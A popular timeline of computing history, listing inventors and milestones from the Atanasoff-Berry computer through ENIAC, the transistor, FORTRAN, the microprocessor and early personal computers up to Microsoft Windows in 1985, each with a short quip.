John Atanasoff & Clifford Berry
ABC Computer
Who was first in the computing biz is not always as easy as ABC.
1944
Howard Aiken & Grace Hopper
Harvard Mark I Computer
The Harvard Mark 1 computer.
1946
John Presper Eckert & John W. Mauchly
ENIAC 1 Computer
20,000 vacuum tubes later...
1948
Frederic Williams & Tom Kilburn
Manchester Baby Computer & The Williams Tube
Baby and the Williams Tube turn on the memories.
1947/48
John Bardeen, Walter Brattain & Wiliam Shockley
The Transistor
No, a transistor is not a computer, but this invention greatly affected the history of computers.
1951
John Presper Eckert & John W. Mauchly
UNIVAC Computer
First commercial computer & able to pick presidential winners.
1953
International Business Machines
IBM 701 EDPM Computer
IBM enters into 'The History of Computers'.
1954
John Backus & IBM
FORTRAN Computer Programming Language
The first successful high level programming language.
Stanford Research Institute, Bank of America, and General Electric
ERMA and MICR
The first bank industry computer - also MICR (magnetic ink character recognition) for reading checks.
1958
Jack Kilby & Robert Noyce
The Integrated Circuit
Otherwise known as 'The Chip'
1962
Steve Russell & MIT
Spacewar Computer Game
The first computer game invented.
1964
Douglas Engelbart
Computer Mouse & Windows
Nicknamed the mouse because the tail came out the end.
1969
ARPAnet The original Internet.
1970
Intel 1103 Computer Memory The world's first available dynamic RAM chip.
1971
Faggin, Hoff & Mazor
Intel 4004 Computer Microprocessor
The first microprocessor.
1971
Alan Shugart &IBM
The "Floppy" Disk
Nicknamed the "Floppy" for its flexibility.
1973
Robert Metcalfe & Xerox
The Ethernet Computer Networking
Networking.
1974/75
Scelbi & Mark-8 Altair & IBM 5100 Computers The first consumer computers.
1976/77
Apple I, II & TRS-80 & Commodore Pet Computers More first consumer computers.
1978
Dan Bricklin & Bob Frankston
VisiCalc Spreadsheet Software
Any product that pays for itself in two weeks is a surefire winner.
1979
Seymour Rubenstein & Rob Barnaby
WordStar Software
Word Processors.
1981
IBM
The IBM PC - Home Computer
From an "Acorn" grows a personal computer revolution
1981
Microsoft
MS-DOS Computer Operating System
From "Quick And Dirty" comes the operating system of the century.
1983
Apple Lisa Computer The first home computer with a GUI, graphical user interface.
1984
Apple Macintosh Computer The more affordable home computer with a GUI.
1985
Microsoft Windows Microsoft begins the friendly war with Apple.


အျပည့္အစံု